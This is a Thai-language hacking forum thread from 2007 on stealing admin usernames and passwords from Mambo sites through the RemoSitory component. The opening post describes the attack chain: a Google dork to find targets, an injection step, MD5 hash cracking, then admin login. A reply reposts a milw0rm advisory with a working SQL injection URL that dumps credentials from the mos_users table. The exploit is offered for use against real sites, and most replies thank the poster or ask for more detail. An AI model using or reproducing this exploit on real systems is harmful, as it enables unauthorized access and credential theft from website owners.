การ hack Mambo เพื่อขโมย username/password

**tonynuc** · 24-08-2007, 04:42 PM

ช่องโหว่ใหม่ล่าสุดของ Mambo Component RemoSitory (cat) ที่สามารถดู username/password ของ Mambo ได้

1) วิธีหา host ที่มีช่องโหว่

http://www.google.co.th/search?q=inurl:fu...tart=0&sa=N

2) วิธีการโจมตี

**Hidden Content: To see this hidden content your post count must be 5 or greater.**

TARGET=ชื่อ website ที่มีช่องโหว่

3) ตัวอย่างการโจมตีจริง

**Hidden Content: To see this hidden content your post count must be 5 or greater.**

4) password ที่ได้มาจะถูก hash ด้วย MD5

ให้นำ hash ที่ได้ไปลอง search database ดูได้ที่

http://www.tmto.org/?category=main&page=search_md5

จะได้ password จริงของ admin มา ลองดูเองนะ ว่าได้อะไร (แต่ห้ามไปลองใช้นะ...)

5) วิธีการ Login ถ้าคนเคยใช้ Mambo จะรู้ว่าหน้า Login อยู่ที่ไหน ไม่รู้ลอง google ดู

Have fun
0x90
tonynuc

**dexdee_04** · 25-08-2007, 07:24 AM

ขอวิธีทำอย่างละเอียดหน่อยครับ ยังไม่เข้าใจครับ ยังไงก็ขอบคุณล่วงหน้าและกันครับ

**owenx12** · 25-08-2007, 02:05 PM

อธิบายยังไม่ค่อยระเอียด ขอละเอียดนิดนึงครับ
ยังไงก้อขอบคุณสำหรับสิ่งดีๆ

**neo2600** · 25-08-2007, 04:30 PM

สุดยอดมากๆครับ ขอบคุณมากๆเลย เมื่อนำมาผนวกกับ google ทำให้เราเห็นอะไรเย๊ะมากครับ จะได้ไปหาทางปิดเว็บป๋มก่อน

**sodazt** · 26-08-2007, 10:40 AM

http://TARGET/index.php?option=com_r...%20mos_users/* <<<<ใครเปิดลิ้งค์นี้ได้้ครับ ผมเปิดไม่ได้นะครับ แก้ไขให้ที

**kenchiro75** · 26-08-2007, 10:54 AM

*******************************************************************************
# Title : Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author : ajann
# Contact :

# S.Page : http://www.remository.com/
# $$ : Free
# Dork : inurl:func=selectcat + com_remository // Result:43.400
# DorkEx : http://www.google.com.tr/search?q=inurl:fu...tart=0&sa=N

*******************************************************************************

[<div class='sqltop'>SQL</div><div class='sqlmain'>]]---------------------------------------------------------

http://[target]/[path]///index.php?option=com_remository&func=[color=blue;font-weight:bold]select[/color]cat&cat=[SQL]

Example:

//index.php?option=com_remository&func=[color=blue;font-weight:bold]select[/color]cat&cat=64549999%20union%20[color=blue;font-weight:bold]select[/color]%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

[ </div>]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-08-23]

**ruknaja007** · 29-08-2007, 05:34 PM

ขอบคุณมากๆเลยครับตือว่าพอดีผมกำลังเรียนอยู่พอดีครับ และผมก็กำลังมีปัญหา คือผมลืมพาสเวิดครับ พอดีเห็นกระทุ้นี้ โดนใจเลยครับ
ตอนแรกนึกว่าจะได้ลงใหม่แล้วครับ ขอบคุณมากครับ

**nakungza** · 29-08-2007, 09:21 PM

ขอบคุณครับ มันมีประโยนช์ต่อผมมากครับ ผมจะเรียนรู้ไว้ เพื่อจะเอาไปประยุกค์ใช้ได้นะครับ

Thread: การ hack Mambo เพื่อขโมย username/password

Thread Tools

Similar Threads

เกี่ยวกับการ Hack Mambo ครับ

Username และ Password สำหลับต่อ Net

update username&password NOD32

update username&password NOD32

Username และ Password สำหรับ Net free คับ

Members who have read this thread : 0

Tags for this Thread

Posting Permissions